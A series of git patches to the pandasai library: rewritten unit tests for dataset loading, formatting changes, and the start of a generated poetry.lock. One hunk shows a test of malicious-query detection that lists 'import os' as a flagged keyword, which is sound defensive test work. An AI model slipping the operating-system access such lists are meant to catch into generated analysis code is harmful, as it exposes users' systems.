-from pandasai.schemas.df_config import Config
-
-
-def test_config_llm_default_type() -> None:
- # Define a mock environment for testing
- os.environ["PANDASAI_API_URL"] = "http://test-server"
- os.environ["PANDASAI_API_KEY"] = "test-api-key"
-
- # Create an instance of Config without any arguments
- config = Config()
-
- # Assert that the llm attribute is an instance of the expected default type (BambooLLM)
- assert isinstance(
- config.llm, BambooLLM
- ), "Default LLM type should be BambooLLM when Config is instantiated without arguments."
diff --git a/tests/unit_tests/test_pandasai_init.py b/tests/unit_tests/test_pandasai_init.py
index f834d162d..472de1618 100644
--- a/tests/unit_tests/test_pandasai_init.py
+++ b/tests/unit_tests/test_pandasai_init.py
@@ -1,8 +1,9 @@
+import pandas
import pytest
from unittest.mock import patch, MagicMock
import pandasai
from pandasai.dataframe.base import DataFrame
-import pandas as pd
+from pandasai.exceptions import DatasetNotFound, PandasAIApiKeyError
class TestPandasAIInit:
@@ -67,17 +68,93 @@ def test_chat_with_single_dataframe(self, sample_dataframes):
)
assert result == "Mocked response"
- def test_load(self):
- with patch("pandasai.DatasetLoader.load") as mock_load:
- mock_load.return_value = DataFrame(
- pd.DataFrame({"email": ["test@example.com"]})
- )
-
- result = pandasai.load("test/users")
-
- assert isinstance(result, DataFrame)
- assert "email" in result.columns
- mock_load.assert_called_once_with("test/users")
+ @patch("pandasai.data_loader.loader.DatasetLoader")
+ @patch("pandasai.helpers.path.find_project_root")
+ @patch("os.path.exists")
+ def test_load_valid_dataset(
+ self, mock_exists, mock_find_project_root, mock_dataset_loader
+ ):
+ """Test loading a valid dataset."""
+ mock_find_project_root.return_value = "/mock/root"
+ mock_dataset_loader.load.return_value = MagicMock(name="DataFrame")
+ mock_exists.return_value = True
+ pandasai._dataset_loader = mock_dataset_loader
+
+ dataset_path = "org/dataset_name"
+ result = pandasai.load(dataset_path)
+
+ mock_dataset_loader.load.assert_called_once_with(dataset_path, False)
+ assert isinstance(result, MagicMock)
+
+ @patch("zipfile.ZipFile")
+ @patch("io.BytesIO")
+ @patch("os.environ")
+    def test_load_dataset_not_found(self, mock_environ, mock_bytes_io, mock_zip_file):
+        """Test loading when the dataset does not exist locally and the API returns not found."""
+        mock_environ.return_value = {"PANDASAI_API_URL": "localhost:8000"}
+ mock_request_session = MagicMock()
+ pandasai.get_pandaai_session = mock_request_session
+ pandasai.get_pandaai_session.return_value = MagicMock()
+ mock_request_session.get.return_value.status_code = 404
+
+ dataset_path = "org/dataset_name"
+
+        with pytest.raises(DatasetNotFound):
+ pandasai.load(dataset_path)
+
+ @patch("pandasai.os.path.exists")
+ @patch("pandasai.os.environ", {"PANDASAI_API_URL": "url"})
+ def test_load_missing_api_key(self, mock_exists):
+ """Test loading when API key is missing."""
+ mock_exists.return_value = False
+ dataset_path = "org/dataset_name"
+
+ with pytest.raises(PandasAIApiKeyError):
+ pandasai.load(dataset_path)
+
+ @patch("pandasai.os.path.exists")
+ @patch("pandasai.os.environ", {"PANDASAI_API_KEY": "key"})
+ def test_load_missing_api_url(self, mock_exists):
+ """Test loading when API URL is missing."""
+ mock_exists.return_value = False
+ dataset_path = "org/dataset_name"
+
+ with pytest.raises(PandasAIApiKeyError):
+ pandasai.load(dataset_path)
+
+ @patch("pandasai.os.environ", new_callable=dict)
+ @patch("pandasai.os.path.exists")
+ @patch("pandasai.get_pandaai_session")
+ @patch("pandasai.ZipFile")
+ @patch("pandasai.BytesIO")
+ @patch("pandasai.data_loader.loader.DatasetLoader")
+ def test_load_successful_zip_extraction(
+ self,
+ mock_dataset_loader,
+ mock_bytes_io,
+ mock_zip_file,
+ mock_get_pandaai_session,
+ mock_exists,
+ mock_os_environ,
+ ):
+ """Test loading when dataset is not found locally but is successfully downloaded."""
+ mock_exists.return_value = False
+ mock_os_environ.update({"PANDASAI_API_KEY": "key", "PANDASAI_API_URL": "url"})
+ mock_request_session = MagicMock()
+ mock_get_pandaai_session.return_value = mock_request_session
+ mock_request_session.get.return_value.status_code = 200
+ mock_request_session.get.return_value.content = b"mock zip content"
+ pandasai._dataset_loader = mock_dataset_loader
+
+ dataset_path = "org/dataset_name"
+
+ # Mock the zip file extraction
+ mock_zip_file.return_value.__enter__.return_value.extractall = MagicMock()
+
+ result = pandasai.load(dataset_path)
+
+ mock_zip_file.return_value.__enter__.return_value.extractall.assert_called_once()
+ assert isinstance(result, MagicMock)
def test_clear_cache(self):
with patch("pandasai.helpers.cache.Cache.clear") as mock_clear:
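test_load_valid_dataset and test_load_successful_zip_extraction above share one pattern: swap the module-level pandasai._dataset_loader singleton for a MagicMock, then assert on its calls. A self-contained sketch of that pattern — fake_pkg and its names are stand-ins, not pandasai's API:

import types
from unittest.mock import MagicMock

# Stand-in for a package module that keeps a loader singleton.
fake_pkg = types.SimpleNamespace(_dataset_loader=None)

def load(path, virtualized=False):
    # Mirrors the shape of pandasai.load: delegate to the module-level singleton.
    return fake_pkg._dataset_loader.load(path, virtualized)

fake_pkg._dataset_loader = MagicMock()
fake_pkg._dataset_loader.load.return_value = "sentinel-df"

assert load("org/dataset_name") == "sentinel-df"
fake_pkg._dataset_loader.load.assert_called_once_with("org/dataset_name", False)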
From 6afb61dfdbbee5877997acc65519afa82cad2642 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 11:32:36 +0100
Subject: [PATCH 20/58] ruff changes
---
tests/unit_tests/agent/test_agent.py | 1 -
tests/unit_tests/core/code_generation/test_code_cleaning.py | 1 -
2 files changed, 2 deletions(-)
diff --git a/tests/unit_tests/agent/test_agent.py b/tests/unit_tests/agent/test_agent.py
index 84db923a5..632a68e5f 100644
--- a/tests/unit_tests/agent/test_agent.py
+++ b/tests/unit_tests/agent/test_agent.py
@@ -455,7 +455,6 @@ def test_malicious_query_detection(self, sample_df, config):
)
def test_query_detection(self, sample_df, config, agent: Agent):
-
# Positive cases: should detect malicious keywords
malicious_queries = [
"import os",
diff --git a/tests/unit_tests/core/code_generation/test_code_cleaning.py b/tests/unit_tests/core/code_generation/test_code_cleaning.py
index 39c077d39..0bb433d03 100644
--- a/tests/unit_tests/core/code_generation/test_code_cleaning.py
+++ b/tests/unit_tests/core/code_generation/test_code_cleaning.py
@@ -8,7 +8,6 @@
class TestCodeCleaner(unittest.TestCase):
-
def setUp(self):
# Setup a mock context for CodeCleaner
self.context = MagicMock(spec=AgentState)
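setUp above builds the CodeCleaner context with MagicMock(spec=AgentState) rather than a bare MagicMock: the spec makes the mock reject attribute names the real class does not define, so a typo in the code under test fails loudly instead of silently returning another mock. A tiny illustration (StubState is a stand-in, not pandasai's AgentState):

from unittest.mock import MagicMock

class StubState:
    config = None
    memory = None

ctx = MagicMock(spec=StubState)
ctx.config = {"llm": "fake-llm"}  # allowed: `config` is on the spec
try:
    ctx.no_such_attribute         # blocked: not on the spec
except AttributeError:
    print("spec'd mock rejected an unknown attribute")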
From 28bb719c0760909d5670052ea935ba7eb03dcb99 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 11:33:47 +0100
Subject: [PATCH 21/58] add poetry lock file
---
poetry.lock | 2589 +++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 2589 insertions(+)
create mode 100644 poetry.lock
diff --git a/poetry.lock b/poetry.lock
new file mode 100644
index 000000000..a5f68c583
--- /dev/null
+++ b/poetry.lock
@@ -0,0 +1,2589 @@
+# This file is automatically @generated by Poetry 1.8.5 and should not be changed by hand.
+
+[[package]]
+name = "annotated-types"
+version = "0.7.0"
+description = "Reusable constraint types to use with typing.Annotated"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "annotated_types-0.7.0-py3-none-any.whl", hash = "sha256:1f02e8b43a8fbbc3f3e0d4f0f4bfc8131bcb4eebe8849b8e5c773f3a1c582a53"},
+ {file = "annotated_types-0.7.0.tar.gz", hash = "sha256:aff07c09a53a08bc8cfccb9c85b05f1aa9a2a6f23728d790723543408344ce89"},
+]
+
+[package.dependencies]
+typing-extensions = {version = ">=4.0.0", markers = "python_version < \"3.9\""}
+
+[[package]]
+name = "astor"
+version = "0.8.1"
+description = "Read/rewrite/write Python ASTs"
+optional = false
+python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,>=2.7"
+files = [
+ {file = "astor-0.8.1-py2.py3-none-any.whl", hash = "sha256:070a54e890cefb5b3739d19f30f5a5ec840ffc9c50ffa7d23cc9fc1a38ebbfc5"},
+ {file = "astor-0.8.1.tar.gz", hash = "sha256:6a6effda93f4e1ce9f618779b2dd1d9d84f1e32812c23a29b3fff6fd7f63fa5e"},
+]
+
+[[package]]
+name = "astunparse"
+version = "1.6.3"
+description = "An AST unparser for Python"
+optional = false
+python-versions = "*"
+files = [
+ {file = "astunparse-1.6.3-py2.py3-none-any.whl", hash = "sha256:c2652417f2c8b5bb325c885ae329bdf3f86424075c4fd1a128674bc6fba4b8e8"},
+ {file = "astunparse-1.6.3.tar.gz", hash = "sha256:5ad93a8456f0d084c3456d059fd9a92cce667963232cbf763eac3bc5b7940872"},
+]
+
+[package.dependencies]
+six = ">=1.6.1,<2.0"
+wheel = ">=0.23.0,<1.0"
+
+[[package]]
+name = "beautifulsoup4"
+version = "4.12.3"
+description = "Screen-scraping library"
+optional = true
+python-versions = ">=3.6.0"
+files = [
+ {file = "beautifulsoup4-4.12.3-py3-none-any.whl", hash = "sha256:b80878c9f40111313e55da8ba20bdba06d8fa3969fc68304167741bbf9e082ed"},
+ {file = "beautifulsoup4-4.12.3.tar.gz", hash = "sha256:74e3d1928edc070d21748185c46e3fb33490f22f52a3addee9aee0f4f7781051"},
+]
+
+[package.dependencies]
+soupsieve = ">1.2"
+
+[package.extras]
+cchardet = ["cchardet"]
+chardet = ["chardet"]
+charset-normalizer = ["charset-normalizer"]
+html5lib = ["html5lib"]
+lxml = ["lxml"]
+
+[[package]]
+name = "certifi"
+version = "2024.12.14"
+description = "Python package for providing Mozilla's CA Bundle."
+optional = false
+python-versions = ">=3.6"
+files = [
+ {file = "certifi-2024.12.14-py3-none-any.whl", hash = "sha256:1275f7a45be9464efc1173084eaa30f866fe2e47d389406136d332ed4967ec56"},
+ {file = "certifi-2024.12.14.tar.gz", hash = "sha256:b650d30f370c2b724812bee08008be0c4163b163ddaec3f2546c1caf65f191db"},
+]
+
+[[package]]
+name = "cfgv"
+version = "3.4.0"
+description = "Validate configuration and produce human readable error messages."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "cfgv-3.4.0-py2.py3-none-any.whl", hash = "sha256:b7265b1f29fd3316bfcd2b330d63d024f2bfd8bcb8b0272f8e19a504856c48f9"},
+ {file = "cfgv-3.4.0.tar.gz", hash = "sha256:e52591d4c5f5dead8e0f673fb16db7949d2cfb3f7da4582893288f0ded8fe560"},
+]
+
+[[package]]
+name = "charset-normalizer"
+version = "3.4.1"
+description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet."
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "charset_normalizer-3.4.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:91b36a978b5ae0ee86c394f5a54d6ef44db1de0815eb43de826d41d21e4af3de"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:7461baadb4dc00fd9e0acbe254e3d7d2112e7f92ced2adc96e54ef6501c5f176"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e218488cd232553829be0664c2292d3af2eeeb94b32bea483cf79ac6a694e037"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:80ed5e856eb7f30115aaf94e4a08114ccc8813e6ed1b5efa74f9f82e8509858f"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b010a7a4fd316c3c484d482922d13044979e78d1861f0e0650423144c616a46a"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4532bff1b8421fd0a320463030c7520f56a79c9024a4e88f01c537316019005a"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:d973f03c0cb71c5ed99037b870f2be986c3c05e63622c017ea9816881d2dd247"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-musllinux_1_2_i686.whl", hash = "sha256:3a3bd0dcd373514dcec91c411ddb9632c0d7d92aed7093b8c3bbb6d69ca74408"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-musllinux_1_2_ppc64le.whl", hash = "sha256:d9c3cdf5390dcd29aa8056d13e8e99526cda0305acc038b96b30352aff5ff2bb"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-musllinux_1_2_s390x.whl", hash = "sha256:2bdfe3ac2e1bbe5b59a1a63721eb3b95fc9b6817ae4a46debbb4e11f6232428d"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:eab677309cdb30d047996b36d34caeda1dc91149e4fdca0b1a039b3f79d9a807"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-win32.whl", hash = "sha256:c0429126cf75e16c4f0ad00ee0eae4242dc652290f940152ca8c75c3a4b6ee8f"},
+ {file = "charset_normalizer-3.4.1-cp310-cp310-win_amd64.whl", hash = "sha256:9f0b8b1c6d84c8034a44893aba5e767bf9c7a211e313a9605d9c617d7083829f"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:8bfa33f4f2672964266e940dd22a195989ba31669bd84629f05fab3ef4e2d125"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:28bf57629c75e810b6ae989f03c0828d64d6b26a5e205535585f96093e405ed1"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f08ff5e948271dc7e18a35641d2f11a4cd8dfd5634f55228b691e62b37125eb3"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:234ac59ea147c59ee4da87a0c0f098e9c8d169f4dc2a159ef720f1a61bbe27cd"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fd4ec41f914fa74ad1b8304bbc634b3de73d2a0889bd32076342a573e0779e00"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:eea6ee1db730b3483adf394ea72f808b6e18cf3cb6454b4d86e04fa8c4327a12"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:c96836c97b1238e9c9e3fe90844c947d5afbf4f4c92762679acfe19927d81d77"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-musllinux_1_2_i686.whl", hash = "sha256:4d86f7aff21ee58f26dcf5ae81a9addbd914115cdebcbb2217e4f0ed8982e146"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-musllinux_1_2_ppc64le.whl", hash = "sha256:09b5e6733cbd160dcc09589227187e242a30a49ca5cefa5a7edd3f9d19ed53fd"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-musllinux_1_2_s390x.whl", hash = "sha256:5777ee0881f9499ed0f71cc82cf873d9a0ca8af166dfa0af8ec4e675b7df48e6"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:237bdbe6159cff53b4f24f397d43c6336c6b0b42affbe857970cefbb620911c8"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-win32.whl", hash = "sha256:8417cb1f36cc0bc7eaba8ccb0e04d55f0ee52df06df3ad55259b9a323555fc8b"},
+ {file = "charset_normalizer-3.4.1-cp311-cp311-win_amd64.whl", hash = "sha256:d7f50a1f8c450f3925cb367d011448c39239bb3eb4117c36a6d354794de4ce76"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-macosx_10_13_universal2.whl", hash = "sha256:73d94b58ec7fecbc7366247d3b0b10a21681004153238750bb67bd9012414545"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:dad3e487649f498dd991eeb901125411559b22e8d7ab25d3aeb1af367df5efd7"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c30197aa96e8eed02200a83fba2657b4c3acd0f0aa4bdc9f6c1af8e8962e0757"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2369eea1ee4a7610a860d88f268eb39b95cb588acd7235e02fd5a5601773d4fa"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:bc2722592d8998c870fa4e290c2eec2c1569b87fe58618e67d38b4665dfa680d"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ffc9202a29ab3920fa812879e95a9e78b2465fd10be7fcbd042899695d75e616"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:804a4d582ba6e5b747c625bf1255e6b1507465494a40a2130978bda7b932c90b"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-musllinux_1_2_i686.whl", hash = "sha256:0f55e69f030f7163dffe9fd0752b32f070566451afe180f99dbeeb81f511ad8d"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:c4c3e6da02df6fa1410a7680bd3f63d4f710232d3139089536310d027950696a"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-musllinux_1_2_s390x.whl", hash = "sha256:5df196eb874dae23dcfb968c83d4f8fdccb333330fe1fc278ac5ceeb101003a9"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:e358e64305fe12299a08e08978f51fc21fac060dcfcddd95453eabe5b93ed0e1"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-win32.whl", hash = "sha256:9b23ca7ef998bc739bf6ffc077c2116917eabcc901f88da1b9856b210ef63f35"},
+ {file = "charset_normalizer-3.4.1-cp312-cp312-win_amd64.whl", hash = "sha256:6ff8a4a60c227ad87030d76e99cd1698345d4491638dfa6673027c48b3cd395f"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-macosx_10_13_universal2.whl", hash = "sha256:aabfa34badd18f1da5ec1bc2715cadc8dca465868a4e73a0173466b688f29dda"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:22e14b5d70560b8dd51ec22863f370d1e595ac3d024cb8ad7d308b4cd95f8313"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:8436c508b408b82d87dc5f62496973a1805cd46727c34440b0d29d8a2f50a6c9"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2d074908e1aecee37a7635990b2c6d504cd4766c7bc9fc86d63f9c09af3fa11b"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:955f8851919303c92343d2f66165294848d57e9bba6cf6e3625485a70a038d11"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:44ecbf16649486d4aebafeaa7ec4c9fed8b88101f4dd612dcaf65d5e815f837f"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:0924e81d3d5e70f8126529951dac65c1010cdf117bb75eb02dd12339b57749dd"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:2967f74ad52c3b98de4c3b32e1a44e32975e008a9cd2a8cc8966d6a5218c5cb2"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-musllinux_1_2_ppc64le.whl", hash = "sha256:c75cb2a3e389853835e84a2d8fb2b81a10645b503eca9bcb98df6b5a43eb8886"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-musllinux_1_2_s390x.whl", hash = "sha256:09b26ae6b1abf0d27570633b2b078a2a20419c99d66fb2823173d73f188ce601"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:fa88b843d6e211393a37219e6a1c1df99d35e8fd90446f1118f4216e307e48cd"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-win32.whl", hash = "sha256:eb8178fe3dba6450a3e024e95ac49ed3400e506fd4e9e5c32d30adda88cbd407"},
+ {file = "charset_normalizer-3.4.1-cp313-cp313-win_amd64.whl", hash = "sha256:b1ac5992a838106edb89654e0aebfc24f5848ae2547d22c2c3f66454daa11971"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f30bf9fd9be89ecb2360c7d94a711f00c09b976258846efe40db3d05828e8089"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:97f68b8d6831127e4787ad15e6757232e14e12060bec17091b85eb1486b91d8d"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:7974a0b5ecd505609e3b19742b60cee7aa2aa2fb3151bc917e6e2646d7667dcf"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fc54db6c8593ef7d4b2a331b58653356cf04f67c960f584edb7c3d8c97e8f39e"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:311f30128d7d333eebd7896965bfcfbd0065f1716ec92bd5638d7748eb6f936a"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-musllinux_1_2_aarch64.whl", hash = "sha256:7d053096f67cd1241601111b698f5cad775f97ab25d81567d3f59219b5f1adbd"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-musllinux_1_2_i686.whl", hash = "sha256:807f52c1f798eef6cf26beb819eeb8819b1622ddfeef9d0977a8502d4db6d534"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-musllinux_1_2_ppc64le.whl", hash = "sha256:dccbe65bd2f7f7ec22c4ff99ed56faa1e9f785482b9bbd7c717e26fd723a1d1e"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-musllinux_1_2_s390x.whl", hash = "sha256:2fb9bd477fdea8684f78791a6de97a953c51831ee2981f8e4f583ff3b9d9687e"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-musllinux_1_2_x86_64.whl", hash = "sha256:01732659ba9b5b873fc117534143e4feefecf3b2078b0a6a2e925271bb6f4cfa"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-win32.whl", hash = "sha256:7a4f97a081603d2050bfaffdefa5b02a9ec823f8348a572e39032caa8404a487"},
+ {file = "charset_normalizer-3.4.1-cp37-cp37m-win_amd64.whl", hash = "sha256:7b1bef6280950ee6c177b326508f86cad7ad4dff12454483b51d8b7d673a2c5d"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:ecddf25bee22fe4fe3737a399d0d177d72bc22be6913acfab364b40bce1ba83c"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8c60ca7339acd497a55b0ea5d506b2a2612afb2826560416f6894e8b5770d4a9"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b7b2d86dd06bfc2ade3312a83a5c364c7ec2e3498f8734282c6c3d4b07b346b8"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:dd78cfcda14a1ef52584dbb008f7ac81c1328c0f58184bf9a84c49c605002da6"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e27f48bcd0957c6d4cb9d6fa6b61d192d0b13d5ef563e5f2ae35feafc0d179c"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:01ad647cdd609225c5350561d084b42ddf732f4eeefe6e678765636791e78b9a"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:619a609aa74ae43d90ed2e89bdd784765de0a25ca761b93e196d938b8fd1dbbd"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:89149166622f4db9b4b6a449256291dc87a99ee53151c74cbd82a53c8c2f6ccd"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-musllinux_1_2_ppc64le.whl", hash = "sha256:7709f51f5f7c853f0fb938bcd3bc59cdfdc5203635ffd18bf354f6967ea0f824"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-musllinux_1_2_s390x.whl", hash = "sha256:345b0426edd4e18138d6528aed636de7a9ed169b4aaf9d61a8c19e39d26838ca"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:0907f11d019260cdc3f94fbdb23ff9125f6b5d1039b76003b5b0ac9d6a6c9d5b"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-win32.whl", hash = "sha256:ea0d8d539afa5eb2728aa1932a988a9a7af94f18582ffae4bc10b3fbdad0626e"},
+ {file = "charset_normalizer-3.4.1-cp38-cp38-win_amd64.whl", hash = "sha256:329ce159e82018d646c7ac45b01a430369d526569ec08516081727a20e9e4af4"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:b97e690a2118911e39b4042088092771b4ae3fc3aa86518f84b8cf6888dbdb41"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:78baa6d91634dfb69ec52a463534bc0df05dbd546209b79a3880a34487f4b84f"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1a2bc9f351a75ef49d664206d51f8e5ede9da246602dc2d2726837620ea034b2"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:75832c08354f595c760a804588b9357d34ec00ba1c940c15e31e96d902093770"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0af291f4fe114be0280cdd29d533696a77b5b49cfde5467176ecab32353395c4"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0167ddc8ab6508fe81860a57dd472b2ef4060e8d378f0cc555707126830f2537"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:2a75d49014d118e4198bcee5ee0a6f25856b29b12dbf7cd012791f8a6cc5c496"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:363e2f92b0f0174b2f8238240a1a30142e3db7b957a5dd5689b0e75fb717cc78"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-musllinux_1_2_ppc64le.whl", hash = "sha256:ab36c8eb7e454e34e60eb55ca5d241a5d18b2c6244f6827a30e451c42410b5f7"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-musllinux_1_2_s390x.whl", hash = "sha256:4c0907b1928a36d5a998d72d64d8eaa7244989f7aaaf947500d3a800c83a3fd6"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:04432ad9479fa40ec0f387795ddad4437a2b50417c69fa275e212933519ff294"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-win32.whl", hash = "sha256:3bed14e9c89dcb10e8f3a29f9ccac4955aebe93c71ae803af79265c9ca5644c5"},
+ {file = "charset_normalizer-3.4.1-cp39-cp39-win_amd64.whl", hash = "sha256:49402233c892a461407c512a19435d1ce275543138294f7ef013f0b63d5d3765"},
+ {file = "charset_normalizer-3.4.1-py3-none-any.whl", hash = "sha256:d98b1668f06378c6dbefec3b92299716b931cd4e6061f3c875a71ced1780ab85"},
+ {file = "charset_normalizer-3.4.1.tar.gz", hash = "sha256:44251f18cd68a75b56585dd00dae26183e102cd5e0f9f1466e6df5da2ed64ea3"},
+]
+
+[[package]]
+name = "click"
+version = "8.1.8"
+description = "Composable command line interface toolkit"
+optional = false
+python-versions = ">=3.7"
+files = [
